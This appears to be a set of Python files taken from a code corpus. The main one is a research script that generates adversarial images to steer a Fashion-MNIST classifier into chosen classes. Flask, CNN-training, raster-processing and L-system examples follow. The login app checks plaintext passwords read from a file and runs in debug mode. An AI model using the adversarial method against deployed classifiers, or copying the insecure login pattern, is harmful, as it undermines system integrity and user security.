tf\nfrom keras.utils import np_utils\nimport glob\n#import imageio\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n#import PIL\nfrom tensorflow.keras import layers\nimport timeit\nimport time\n\n#from skimage.measure import compare_ssim\nfrom skimage.measure import compare_ssim\n\nimport pickle\n\nimport pydot\nimport graphviz\n\nfrom numpy import linalg as LA\n\nfrom IPython import display\n\nfrom tensorflow.keras import Input, Model\n\nfrom keras.models import load_model\n\n\n\n#####################################################################\n################### get_S_function\n#####################################################################\ndef get_S_function(M,r):\n '''\n\n :param M: is the number of labels\n :param r: the labels we want to take out\n :return: [M]\\r, where [M] := {0,1,2,...,M-1}\n '''\n all_M = np.arange(0, M)\n return np.setdiff1d(all_M,r)\n#########################################################################################################################################\n\n\n#####################################################################\n################### get_S_function\n#####################################################################\ndef sup_lbl_from_lbl_2(input_lbl):\n\n\n if input_lbl==0 or input_lbl==2 or input_lbl==6:\n sup_lbl_from_lbl = 0\n elif input_lbl==1 or input_lbl==5 or input_lbl==7 or input_lbl==9:\n sup_lbl_from_lbl = 1\n elif input_lbl == 3 or input_lbl == 4 or input_lbl == 8:\n sup_lbl_from_lbl = 2\n\n return sup_lbl_from_lbl\n#########################################################################################################################################\n\n\n#########################################################################################################################################\n############################### relu_scaler_Ismail ######\n#########################################################################################################################################\ndef relu_scaler_Ismail(x):\n '''\n :param x: scaler\n :return: y=relu(x)\n '''\n y=0\n if x >= 0:\n y=x\n else:\n y=0\n return y\n#########################################################################################################################################\n\n\n#########################################################################################################################################\n############################### SSIM fucntion ######\n#########################################################################################################################################\ndef SSIM_index(imageA, imageB):\n\n imageA = imageA.reshape(28, 28)\n imageB = imageB.reshape(28, 28)\n\n # rho_inf = LA.norm(input_image.reshape(784, 1) - X_test_pert[idx].reshape(784, 1) , np.inf)\n (D_s, diff) = compare_ssim(imageA, imageB, full=True)\n return D_s\n#########################################################################################################################################\n\n\n\n#########################################################################################################################################\n############################### SSIM fucntion ######\n#########################################################################################################################################\n\ntargeted_super_label_confer = pickle.load(open(\"/home/ismail/pycharmProjects/SSLTL_project/RL_adv_attacks_LP/targeted_super_label_confer.p\",\"rb\"))\n\n#########################################################################################################################################\n\n\n##########################################################################################\n############################### jensen shannon divergence fucntion - ######\n##########################################################################################\n\"\"\"\nit is a normalized and stable version of the KL divergence and return values between [0,1] where 0 is two identical distributions\n\"\"\"\n\nfrom scipy.spatial.distance import jensenshannon\n\nfrom math import log2\ndef D_JS_PMFs(p, q):\n # D_JS_PMFs(p,q) = D_JS_PMFs(q,p)\n return jensenshannon(p, q, base=2)\n\n\n####################################################################################\n################################ some dataset - MNIST fashion\n####################################################################################\n\n# download mnist data and split into train and test sets\n(train_images, train_labels), (test_images, test_labels) = tf.keras.datasets.fashion_mnist.load_data()\n# reshape data to fit model\nX_train = train_images.reshape(train_images.shape[0], 28, 28, 1)\nX_test = test_images.reshape(test_images.shape[0], 28, 28, 1)\nX_train, X_test = X_train/255, X_test/255\n# normalization:\ntrain_images = train_images / 255\ntest_images = test_images / 255\ny_test = np_utils.to_categorical(test_labels,10)\n# ###############################################\n\n\n####################################################################################\n################################ load trained model(s) and freeze\n####################################################################################\n\n# trained model for the MNIST fashion used for the FHC with 1D input and \\in [0,1]\ntrained_model = tf.keras.models.load_model('my_model_1d_last_dense_activation_seperate')\n# test the CA of the model = 90.09\n#X_test = 2*X_test - 1\n#results = trained_model.evaluate(X_test, y_test)\n#print(\"test loss, test acc:\", results)\n\n######## freeze trained_model\nfor layer in trained_model.layers:\n layer.trainable = False\n\n\n\n\nnumber_of_observations = 5\nsucc=0\nD_ssim_images_save = []\nD_JS_save = []\nrun_time_save = []\n\nBOSS_images = []\n\nfor idx in range(number_of_observations):\n start = timeit.default_timer()\n ########################################################################################\n ###########################################################################\n #################################### BUILDING THE gen model g(z,\\phi)\n ###########################################################################\n\n gen_NN = tf.keras.Sequential()\n initializer = tf.keras.initializers.RandomNormal(mean=0.0, stddev=0.05, seed=102)\n ## ADDING THE GEN MODEL layers that will be trained\n\n layer = layers.Dense(7 * 7 * 256, use_bias=False, input_shape=(100,), name='dense_gen', kernel_initializer=initializer)\n layer.trainable=True\n gen_NN.add(layer)\n\n layer = layers.BatchNormalization()\n layer.trainable=True\n gen_NN.add(layer)\n\n layer = layers.LeakyReLU()\n layer.trainable=True\n gen_NN.add(layer)\n\n layer = layers.Reshape((7, 7, 256),name='reshape_gen')\n layer.trainable=True\n gen_NN.add(layer)\n #assert combined_NN.output_shape == (None, 7, 7, 256)\n\n layer = layers.Conv2DTranspose(128, (5, 5), strides=(1, 1), padding='same', use_bias=False, kernel_initializer=initializer)\n layer.trainable=True\n gen_NN.add(layer)\n #assert gen_NN.output_shape == (None, 14, 14, 64)\n\n layer = layers.BatchNormalization()\n layer.trainable=True\n gen_NN.add(layer)\n\n layer = layers.LeakyReLU()\n layer.trainable=True\n gen_NN.add(layer)\n\n layer = layers.Conv2DTranspose(64, (5, 5), strides=(2, 2), padding='same', use_bias=False, kernel_initializer=initializer)\n layer.trainable=True\n gen_NN.add(layer)\n #assert gen_NN.output_shape == (None, 14, 14, 64)\n\n layer = layers.BatchNormalization()\n layer.trainable=True\n gen_NN.add(layer)\n\n layer = layers.LeakyReLU()\n layer.trainable=True\n gen_NN.add(layer)\n\n layer = layers.Conv2DTranspose(1, (5, 5), strides=(2, 2), padding='same', use_bias=False, activation='sigmoid', kernel_initializer=initializer)\n layer.trainable=True\n gen_NN.add(layer)\n\n\n # below is added for the 1D modification\n layer = layers.Reshape((784, 1, 1),name='reshape_gen_final')\n layer.trainable=True\n gen_NN.add(layer)\n\n\n\n\n #########################################################################################################################################\n ############################### this is NOT sequentiail traning (traning two loss fucntions from different heads of the NN) ######\n #########################################################################################################################################\n\n ### define X_d as the desired\n X_desired = X_test[idx]\n\n # these two need to be have the same values as of now since X_train is the same for both\n batch_size_gen = 80\n batch_size_2 = 80\n\n\n #################### training steps and stopping thresholds\n delta_s = 0.25\n\n delta_js = 0.35\n delta_ssim = 0.80\n\n delta_c = 0.25\n\n traning_steps = 10\n\n ############################################################\n ### automated desired for confidence reduction y_d (desired PMF)\n ################################################################\n number_of_classes = 10\n # take the predicted class instead of the true label\n #target_class = test_labels[idx]\n target_class = np.argmax(trained_model(X_desired.reshape(1, 784, 1)).numpy()[0])\n\n target_super_label = targeted_super_label_confer[idx]\n\n if target_super_label == 0:\n S_T = [0,2,6]\n if target_super_label == 1:\n S_T = [1,5,7,9]\n if target_super_label == 2:\n S_T = [3,4,8]\n\n S_T = np.array(S_T)\n\n S_T_comp = get_S_function(10, S_T)\n\n output_predictions = trained_model(X_desired.reshape(1, 784, 1)).numpy()[0]\n\n output_predictions[S_T_comp] = -100\n\n desired_target_j_star = np.argmax(output_predictions)\n\n desired_PMF = np.zeros(shape=(1, number_of_classes))\n desired_PMF[0][desired_target_j_star] = 1\n\n # # if Targeted finer label is given, then imedetaely do:\n # desired_PMF = np.zeros(shape=(1, number_of_classes))\n # desired_PMF[0][target_finer] = 1\n\n ################################################################\n ##### X_train is the same for both gen and combined models #####\n ################################################################\n # build x_train as some random input and y_train to be the desired image\n # X_train is the same as z in the paper\n\n # create one vector and repeat\n X_train_one = tf.random.uniform(shape=[1,100], minval=0., maxval=1., seed=101)\n X_train_one_np = X_train_one.numpy()\n X_train_np = np.zeros(shape=(batch_size_gen,100))\n for i in range(batch_size_gen):\n X_train_np[i,:] = X_train_one_np\n X_train = tf.convert_to_tensor(X_train_np, dtype=tf.float32)\n X_val_np = X_train_one_np\n X_val = tf.convert_to_tensor(X_val_np, dtype=tf.float32)\n\n\n ############################################################\n ### Y_train_gen for the gen model (whcih is the image)\n ################################################################\n\n # below is for the 1D image\n Y_train_np_gen = np.zeros(shape=(batch_size_gen,784,1,1))\n Y_val_gen = X_desired.reshape(1,784,1,1)\n for i in range(batch_size_gen):\n Y_train_np_gen[i,:,:,:] = Y_val_gen.reshape(784,1,1)\n # convert Y_train to tf eager tensor\n Y_train_gen = tf.convert_to_tensor(Y_train_np_gen, dtype=tf.float32)\n\n\n ############################################################\n ### Y_train_combined is the y_d (desired PMF)\n ################################################################\n\n Y_train_combined = np.zeros(shape=(batch_size_2,10))\n\n Y_val_combined = desired_PMF\n\n for i in range(batch_size_2):\n Y_train_combined[i,:] = Y_val_combined\n\n Y_desired = Y_val_combined[0]\n\n print('break')\n\n\n ####################################################################################################################\n ### defining the combined model such that its the concatenation of g, then f ==> this is defing model h in the paper\n #############################################################################################################################\n\n input = Input(shape=100)\n\n x = gen_NN.layers[0](input)\n for lay in range(len(gen_NN.layers) - 1):\n layer = gen_NN.layers[lay+1]\n layer.trainable = True\n x = layer(x)\n out_1 = x\n\n\n x_2 = trained_model.layers[0](x)\n for lay in range(len(trained_model.layers) - 1):\n layer = trained_model.layers[lay + 1]\n layer.trainable = False\n x_2 = layer(x_2)\n out_2 = x_2\n\n\n ### defining the model: this is h(z,\\psi)\n combined_NN = Model(input, [out_1, out_2])\n\n ### defning the optimizer\n optimizer = tf.keras.optimizers.Adam(learning_rate=0.05)\n\n loss_1 = tf.keras.losses.MeanSquaredError(name='LOSS_1')\n\n loss_2 = tf.keras.losses.CategoricalCrossentropy(name='LOSS_2', from_logits=False,label_smoothing=0)\n\n dynamic_weights_selection = True\n # initial losses functions weights\n lambda_gen = 1\n lambda_pmf = 0.01\n\n ############# trainING LOOP\n for i in range(traning_steps):\n\n\n combined_NN.compile(optimizer=optimizer, loss=[loss_1, loss_2], loss_weights=[lambda_gen, lambda_pmf])\n # for lay in range(18):\n # if lay >= 12:\n # layer = combined_NN.layers[lay]\n # layer.trainable = False\n\n # traning\n combined_NN.fit(X_train,[Y_train_gen, Y_train_combined], epochs=1, batch_size=1, validation_data=(X_val, [Y_val_gen,Y_val_combined]), verbose=0 )\n #combined_NN.train_on_batch(X_train, [Y_train_gen, Y_train_combined])\n # fake image at step i ==> this is X in the paper and X_val is z in the paper\n fake_image = combined_NN(X_val)[0].numpy().reshape(28, 28)\n\n\n #trained_model = load_model(\"MNIST_digits_trained_model_3.h5\")\n trained_model = tf.keras.models.load_model('my_model_1d_last_dense_activation_seperate')\n output_vector_probabilities = trained_model(fake_image.reshape(1, 28, 28, 1)).numpy()[0]\n #output_vector_probabilities = combined_NN(X_val)[1].numpy().reshape(10,)\n\n # D_2 distance between real image and fake image at step i==> this is equation (9)\n D_2_s = LA.norm(X_desired.reshape(784,) - fake_image.reshape(784,), 2)\n # SSIM distance between real image and fake image at step i ==>\n D_ssim_images = SSIM_index(X_desired, fake_image)\n # D_2 distance between desired PMF and the PMF returned by the fake image ==> this is equation (3)\n D_2 = LA.norm(output_vector_probabilities-Y_desired, 2 )\n # D_JS: JS divergence distance between desired and actual PMFs (it uses KL divergence)\n D_JS = D_JS_PMFs(output_vector_probabilities, Y_desired)\n\n\n ### THE STOPPING EXIT CRITERIA\n if D_ssim_images >= delta_ssim and D_JS <= delta_js:\n #print('BREAKING FOR IS USED with Distance SSIM = ', D_ssim_images, ' and D_JS = ', D_JS)\n break\n\n ### logger:\n #print('training step = ', i, '; image SSIM = ', D_ssim_images, ' ; PMF_JS_Distance = ', D_JS, ' ; current loss weights = ', lambda_gen,' , ', lambda_pmf )\n\n ##### dynamic weight selection option in training\n if dynamic_weights_selection is True:\n lambda_gen = relu_scaler_Ismail(lambda_gen - 0.01 * 1 * ((D_ssim_images/delta_ssim)) * np.sign((D_ssim_images/delta_ssim)-1))\n lambda_pmf = relu_scaler_Ismail(lambda_pmf - 0.05 * 0.01 * ((delta_js/D_JS)) * np.sign((delta_js/D_JS )-1))\n else:\n lambda_gen = 1\n lambda_pmf = 0.01\n\n\n ### SAVE THE DISTNCE AND PERTURBED IMAGE SO AS TO TAKE THE MINIMUM AT THE END OF THE TRAINING STEP (THIS IS TO OVER COME OVERFITTING DURING TRAINING)\n\n\n\n fake_image = combined_NN(X_val)[0].numpy().reshape(28,28)\n\n ### below is the same thing (just for sanity check)\n #trained_model = load_model(\"MNIST_digits_trained_range_1to1_1d_input.h5\")\n trained_model = tf.keras.models.load_model('my_model_1d_last_dense_activation_seperate')\n output_vector_probabilities = trained_model(fake_image.reshape(1,28,28,1)).numpy()[0]\n\n\n\n real_image = X_desired.reshape(28,28)\n\n confidence_score = np.max(trained_model(X_desired.reshape(1,28,28,1)).numpy()[0])\n\n confidence_score_BOSS = np.max(trained_model(fake_image.reshape(1,28,28,1)).numpy()[0])\n\n #### passing criteria: target_super_set = predicted_super_set(X_BOSS)\n if sup_lbl_from_lbl_2(np.argmax(trained_model(fake_image.reshape(1, 784, 1)).numpy()[0])) == target_super_label:\n succ = succ + 1\n\n\n #### outer loop logger:\n print('[index,succ] = ',[idx,succ],' - [target,predicted] = ',[target_super_label,sup_lbl_from_lbl_2(np.argmax(trained_model(fake_image.reshape(1, 784, 1)).numpy()[0]))],' - [SSIM,JS] = ',[D_ssim_images,D_JS])\n\n D_ssim_images_save.append(D_ssim_images)\n D_JS_save.append(D_JS)\n\n stop = timeit.default_timer()\n run_time_save.append(stop - start)\n BOSS_images.append(fake_image)\n #print('Time: ', stop - start)\n\n\nprint('OVERALL PERFORMANCE: ', 'succ = ' , 100*(succ/number_of_observations) , 'AVG_SSIM_JS = ',[np.mean(D_ssim_images_save),np.mean(D_JS_save)], ' AVG runtime = ',np.mean(run_time_save))\n\n\n# plt.figure()\n# plt.subplot(2,2,1)\n# plt.title('Desired example')\n# plt.imshow(real_image,cmap='gray',vmin=0, vmax=1)\n# plt.colorbar()\n# plt.axis('off')\n# plt.subplot(2,2,2)\n# plt.title('Generated example')\n# plt.imshow(fake_image,cmap='gray',vmin=0, vmax=1)\n# plt.colorbar()\n# plt.axis('off')\n# plt.subplot(2,2,4)\n# plt.title('Generated example PMF')\n# plt.stem(output_vector_probabilities)\n# plt.ylim(top=1.2)\n# plt.subplot(2,2,3)\n# plt.title('Desired PMF')\n# plt.stem(Y_val_combined[0])\n# plt.ylim(top=1.2)\n\n\n\nprint('break')\n\n\n\n","sub_path":"GenNNs_BOSS_MNIST_fashion_HCs_FHC_Targ.py","file_name":"GenNNs_BOSS_MNIST_fashion_HCs_FHC_Targ.py","file_ext":"py","file_size_in_byte":17844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"478704292","text":"#!/usr/bin/python3\n\"\"\" Module comment \"\"\"\n\nfrom flask import Flask\nfrom models import storage\nfrom models.state import State\nfrom flask import render_template\n\napp = Flask(__name__)\napp.url_map.strict_slashes = False\n\n\n@app.teardown_appcontext\ndef closetorage(self):\n \"\"\"Close storage session\"\"\"\n storage.close()\n\n\n@app.route('/states_list')\ndef trace_route():\n \"\"\" Display states in HTML\"\"\"\n states = storage.all(State).values()\n return render_template('7-states_list.html', states=states)\n\n\nif __name__ == \"__main__\":\n app.run(port=5000, host='0.0.0.0', debug=True)\n","sub_path":"web_flask/7-states_list.py","file_name":"7-states_list.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"234845803","text":"# Importing libs\nfrom flask import Flask, url_for, redirect, request, render_template\n\nclass Utils:\n\n def read_file(self, file_name):\n file = open(file_name, \"r+\")\n lines = file.readlines()\n file.close()\n\n return lines\n\n def load_users(self, list_users):\n dict_current_users = {}\n for user in list_users:\n dict_current_users.update({user.split(\"|\")[0]: user.split(\"|\")[1]})\n\n return dict_current_users\n\n def load_grades(self, grades, user):\n dict_current_grades = {}\n for grade in grades:\n dict_current_grades.update({grade.split('|')[0]: grade.split('|')[1:-1]})\n return dict_current_grades.get(user)\n\n def validate_login(self, username, password):\n try:\n current_users = self.read_file(\"keylogs.txt\")\n except FileNotFoundError:\n current_users = []\n\n dict_current_users = self.load_users(current_users)\n\n try:\n return password == dict_current_users[username]\n except KeyError:\n return False\n\n\n# app Flask instance\napp = Flask(__name__)\n\nusers_projects = {'rafael': [[0, 'ler documentação flask', '31/03/2019', 'Rafael'],\n [1, 'ler documentação jinja', '31/03/2019', 'Rafael']],\n 'tonho': [[0, 'estudar IA', '31/03/2019', 'Tonho'],\n [1, 'estudar paradigmas', '31/03/2019', 'Tonho']]}\n\nprojects_activities = {'rafael0':\n[\n [0, 'Nome ativ_1 proj_0','14/03/2019', '31/03/2019', 'Rafael', 'Detalhamento Ativ 1'],\n [1, 'Nome ativ_2 proj_0','14/03/2019', '31/03/2019', 'Rafael', 'Detalhamento Ativ 2'],\n [2, 'Nome ativ_3 proj_0','14/03/2019', '31/03/2019', 'Rafael', 'Detalhamento Ativ 3']\n],\n 'rafael1':\n[\n [0, 'Nome ativ_1 proj_1','14/03/2019', '31/03/2019', 'Rafael', 'Detalhamento Ativ 1'],\n [1, 'Nome ativ_2 proj_1','14/03/2019', '31/03/2019', 'Rafael', 'Detalhamento Ativ 2'],\n [2, 'Nome ativ_3 proj_1','14/03/2019', '31/03/2019', 'Rafael', 'Detalhamento Ativ 3']\n],\n 'tonho0':\n[\n [0, 'Nome ativ_1 proj_0','14/03/2019', '31/03/2019', 'Tonho', 'Detalhamento Ativ 1'],\n [1, 'Nome ativ_2 proj_0','14/03/2019', '31/03/2019', 'Tonho', 'Detalhamento Ativ 2'],\n [2, 'Nome ativ_3 proj_0','14/03/2019', '31/03/2019', 'Tonho', 'Detalhamento Ativ 3']\n],\n 'tonho1':\n[\n [0, 'Nome ativ_1 proj_1','14/03/2019', '31/03/2019', 'Tonho', 'Detalhamento Ativ 1'],\n [1, 'Nome ativ_2 proj_1','14/03/2019', '31/03/2019', 'Tonho', 'Detalhamento Ativ 2'],\n [2, 'Nome ativ_3 proj_1','14/03/2019', '31/03/2019', 'Tonho', 'Detalhamento Ativ 3']\n]}\n\n\n# route to /\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n login = request.form['username']\n password = request.form['password']\n\n util = Utils()\n if util.validate_login(login, password):\n return render_template('oi.html', username=login, projects= users_projects)\n else:\n return render_template('index.html', erro='Login e/ou senha incorreto')\n\n return(render_template('index.html', erro='Método não permitido.'))\n\n\n@app.route('/prepare_activities')\ndef prepare_activities():\n username = request.args.get('username')\n proj = request.args.get('proj')\n project_id = username+str(proj)\n\n return render_template('activities.html', username= username,\n activities= projects_activities[project_id],\n project= project_id)\n\n@app.route('/activity')\ndef detail_activity():\n username = request.args.get('username')\n project_id = request.args.get('project_id')\n activity = request.args.get('activity')\n\n print(project_id, '\\n', activity)\n my_activity = projects_activities[project_id][int(activity)]\n\n return render_template('activity.html', username= username,\n activity= my_activity)\n\n# Starting app\nif __name__ == '__main__':\n app.run(debug=True)\n\n","sub_path":"LTP 2/learningFlask/00 lessons/2019-03-14/projects_main.py","file_name":"projects_main.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"517642572","text":"from torchvision import datasets\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torchvision.transforms import transforms\r\nimport time\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\r\nbatch_size = 96\r\nnum_workers = 0\r\nn_epoches = 100\r\n\r\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\r\nprint(\"using {} device.\".format(device))\r\n\r\ntrain_transform = transforms.Compose([\r\n transforms.Resize(size=(256,256)),\r\n transforms.RandomResizedCrop(224),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.RandomRotation(20),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n])\r\nvalidate_transform = transforms.Compose([\r\n transforms.Resize(size=(256,256)),\r\n transforms.RandomResizedCrop(224),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n])\r\n\r\ndata_dir = './FIRE-SMOKE-DATASET/FIRE-SMOKE-DATASET'\r\ntrain_dir = data_dir + '/Train'\r\nvalidate_dir = data_dir + '/Validation'\r\n\r\ntrain_data = datasets.ImageFolder(train_dir, transform=train_transform)\r\ntrain_loader = torch.utils.data.DataLoader(train_data, batch_size=batch_size, num_workers=num_workers, shuffle=True)\r\nvalidate_data = datasets.ImageFolder(train_dir, transform=validate_transform)\r\nvalidate_loader = torch.utils.data.DataLoader(validate_data, batch_size=batch_size, num_workers=num_workers, shuffle=True)\r\n\r\nclass ZFNetbn(nn.Module):\r\n\r\n def __init__(self, num_classes=2):\r\n super(ZFNetbn, self).__init__()\r\n self.features = nn.Sequential(\r\n nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=2),\r\n nn.BatchNorm2d(64),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=3, stride=2),\r\n nn.Conv2d(64, 192, kernel_size=5, stride=2, padding=2),\r\n nn.BatchNorm2d(192),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=3, stride=2),\r\n nn.Conv2d(192, 384, kernel_size=3, padding=1),\r\n nn.BatchNorm2d(384),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(384, 256, kernel_size=3, padding=1),\r\n nn.BatchNorm2d(256),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(256, 256, kernel_size=3, padding=1),\r\n nn.BatchNorm2d(256),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=3, stride=2),\r\n )\r\n self.avgpool = nn.AdaptiveAvgPool2d((6, 6))\r\n self.classifier = nn.Sequential(\r\n nn.Dropout(),\r\n nn.Linear(256 * 6 * 6, 4096),\r\n nn.ReLU(inplace=True),\r\n nn.Dropout(),\r\n nn.Linear(4096, 4096),\r\n nn.ReLU(inplace=True),\r\n nn.Linear(4096, num_classes),\r\n )\r\n\r\n def forward(self, x):\r\n x = self.features(x)\r\n x = self.avgpool(x)\r\n x = torch.flatten(x, 1)\r\n x = self.classifier(x)\r\n return x\r\n\r\nmodel = ZFNetbn(num_classes = 2)\r\nmodel = model.to(device)\r\n\r\ncriterion = torch.nn.CrossEntropyLoss()\r\noptimizer = torch.optim.Adam(model.parameters(), lr=0.001)\r\n\r\ntrain_accuracy_list = []\r\ntrain_loss_list = []\r\n\r\ndef train(epochs, train_loader, model, optimizer, criterion, save_path):\r\n best_acc = 0\r\n time_start = time.time()\r\n for epoch in range(epochs+1):\r\n train_loss = 0.0\r\n train_acc = 0.0\r\n validate_loss = 0.0\r\n validate_acc = 0.0\r\n model.train()\r\n for batch_idx, (data, target) in enumerate(train_loader):\r\n data = data.to(device)\r\n target = target.to(device)\r\n optimizer.zero_grad()\r\n output = model(data)\r\n _, preds = torch.max(output, 1)\r\n loss = criterion(output, target)\r\n loss.backward()\r\n optimizer.step()\r\n train_acc = train_acc + torch.sum(preds == target.data)\r\n train_loss = train_loss + ((1 / (batch_idx + 1)) * (loss.data - train_loss))\r\n model.eval()\r\n with torch.no_grad():\r\n for batch_idx, (data, target) in enumerate(train_loader):\r\n data = data.to(device)\r\n target = target.to(device)\r\n output = model(data)\r\n _, preds = torch.max(output, 1)\r\n loss = criterion(output, target)\r\n validate_acc = validate_acc + torch.sum(preds == target.data)\r\n validate_loss = validate_loss + loss.item()\r\n train_loss = train_loss / len(train_loader.dataset)\r\n train_acc = train_acc / len(train_loader.dataset)\r\n validate_loss = validate_loss / len(validate_loader.dataset)\r\n validate_acc = validate_acc / len(validate_loader.dataset)\r\n train_accuracy_list.append(train_acc)\r\n train_loss_list.append(train_loss)\r\n print('Epoch: {} \\tTraining Acc: {:6f} \\tTraining Loss: {:6f}'.format(epoch, train_acc, train_loss))\r\n if validate_acc > best_acc:\r\n best_acc = validate_acc\r\n torch.save(model.state_dict(), save_path)\r\n time_end = time.time()\r\n train_time = (time_end - time_start)/epochs\r\n print('Training Time for Each Epoch is ', train_time)\r\n print('finished training')\r\n\r\ntrain(n_epoches, train_loader, model, optimizer, criterion,'./trained-model-ZFNetbn.pth')\r\n\r\nplt.style.use(\"ggplot\")\r\nplt.figure()\r\nplt.plot(train_accuracy_list, label=\"train_acc\")\r\nplt.title(\"ZFNet with BN Train Accuracy\")\r\nplt.xlabel(\"Epoch #\")\r\nplt.ylabel(\"Loss\")\r\nplt.show()\r\n\r\n#Test\r\ntest_dir = data_dir + '/Test'\r\ntest_transforms = transforms.Compose([\r\n transforms.Resize(size=(224,224)),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n])\r\ntest_dataset = datasets.ImageFolder(test_dir, transform=test_transforms)\r\ntest_dataloader = torch.utils.data.DataLoader(test_dataset, batch_size=96, shuffle=True)\r\nnum_classes = 2\r\nsave_path = './trained-model-ZFNetbn.pth'\r\nnet = ZFNetbn(num_classes=num_classes)\r\nnet = net.to(device)\r\nnet.load_state_dict(torch.load(save_path))\r\ntest_acc = 0\r\nnet.eval()\r\nstart_time = time.time()\r\nwith torch.no_grad():\r\n for data in test_dataloader:\r\n images, labels = data\r\n images = images.to(device)\r\n labels = labels.to(device)\r\n output = net(images)\r\n _, prediction = torch.max(output.data, 1)\r\n test_acc = test_acc + torch.sum(prediction == labels)\r\ntest_acc = test_acc / len(test_dataloader.dataset)\r\nend_time = time.time()\r\nprint(\"test time is \", end_time - start_time)\r\nprint('Test Accuracy is ', test_acc)","sub_path":"ZFNetbn.py","file_name":"ZFNetbn.py","file_ext":"py","file_size_in_byte":6587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"405294044","text":"\"\"\"\nalignment.py\n\nAuthor: Tobias Seydewitz\nDate: 01.06.18\nMail: tobi.seyde@gmail.com\n\"\"\"\nimport numpy as np\nfrom time import time\nfrom rasterio.features import rasterize\nfrom tropicly.raster import (clip,\n write,\n merge_from,\n clip_raster,\n round_bounds,\n polygon_from,\n int_to_orient,\n reproject_like,\n make_warp_profile,)\n\n\nCRS = {'init': 'epsg:4326'}\n\n\ndef worker(template, alignments, vector, pathobj):\n # TODO refactor\n kwargs = make_warp_profile(template, CRS)\n kwargs['out'] = pathobj\n\n out = raster_alignment(alignments, **kwargs)\n\n data = rasterize_vector(vector, kwargs['transform'], kwargs['bounds'], (kwargs['height'], kwargs['width']))\n name = 'ifl{:x}.tif'.format(id(data))\n out['ifl'] = write(data, str(pathobj/name), **kwargs)\n\n kwargs['bounds'] = round_bounds(kwargs['bounds'])\n\n return raster_clip(out, **kwargs)\n\n\ndef raster_alignment(alignments, **kwargs):\n # TODO refactor\n out = {}\n\n for key, values in alignments.items():\n values = list(set(values))\n\n name = '{}{:x}.tif'.format(key, abs(hash(''.join(values) + str(time()))))\n path = str(kwargs['out']/name)\n\n err_msg = 'Failed at {} files {}'.format(key, values)\n\n if len(values) == 1:\n try:\n out[key] = reproject_like(*values, path, **kwargs)\n except Exception:\n print(err_msg)\n\n elif len(values) > 1:\n try:\n data, affine = merge_from(values, bounds=kwargs['bounds'], res=kwargs['res'])\n out[key] = write(data, path, **kwargs)\n except Exception:\n print(err_msg)\n\n else:\n continue\n\n return out\n\n\ndef raster_clip(to_clip, bounds, **kwargs):\n orientation = int_to_orient(bounds.left, bounds.top)\n out = {}\n\n for key, value in to_clip.items():\n name = '{}_{}.tif'.format(key, orientation)\n path = str(kwargs['out']/name)\n\n data, transform = clip_raster(value, bounds)\n kwargs.update({'transform': transform})\n out[key] = write(data, path, **kwargs)\n\n return out\n\n\ndef rasterize_vector(vector, transform, bounds, shape):\n \"\"\"\n\n :param transform:\n :param bounds:\n :param shape:\n :param vector:\n :return:\n \"\"\"\n clipper = polygon_from(bounds)\n geometries = list(vector.cx[bounds[0]:bounds[2], bounds[1]:bounds[3]].geometry)\n\n if geometries:\n clipped = clip(clipper, geometries)\n raster = rasterize(clipped, out_shape=shape, transform=transform, dtype=np.uint8)\n\n return raster\n\n return np.zeros(shape=shape, dtype=np.uint8)\n","sub_path":"tropicly/alignment.py","file_name":"alignment.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"308352449","text":"import turtle\n\ndef apply_rules(letter):\n \"\"\"Apply rules to an individual letter, and return the result.\"\"\"\n # Rule 1\n if letter == 'X':\n new_string = 'F[+X][-X]FX'\n\n # Rule 2\n elif letter == 'F':\n new_string = 'FF'\n\n # no rules apply so keep the character\n else:\n new_string = letter\n\n return new_string\n\ndef process_string(original_string):\n \"\"\"Apply rules to a string, one letter at a time, and return the result.\"\"\"\n tranformed_string = \"\"\n for letter in original_string:\n tranformed_string = tranformed_string + apply_rules(letter)\n\n return tranformed_string\n\ndef create_l_system(number_of_iterations, axiom):\n \"\"\"Begin with an axiom, and apply rules to the original axiom string number_of_iterations times, then return the result.\"\"\"\n start_string = axiom\n for counter in range(number_of_iterations):\n end_string = process_string(start_string)\n start_string = end_string\n\n return end_string\n\ndef draw_l_system(some_turtle, instructions, angle, distance):\n \"\"\"Draw with some_turtle, interpreting each letter in the instructions passed in.\"\"\"\n saved_info_list = []\n for task in instructions:\n if task == 'F':\n some_turtle.forward(distance)\n elif task == 'B':\n some_turtle.backward(distance)\n elif task == '+':\n some_turtle.right(angle)\n elif task == '-':\n some_turtle.left(angle)\n elif task == '[':\n saved_info_list.append([some_turtle.heading(), some_turtle.xcor(), some_turtle.ycor()])\n \n # print(saved_info_list)\n elif task == ']':\n some_turtle.begin_fill()\n some_turtle.circle(3)\n some_turtle.end_fill() \n new_info = saved_info_list.pop()\n some_turtle.setheading(new_info[0])\n some_turtle.goto(new_info[1], new_info[2])\n\n# 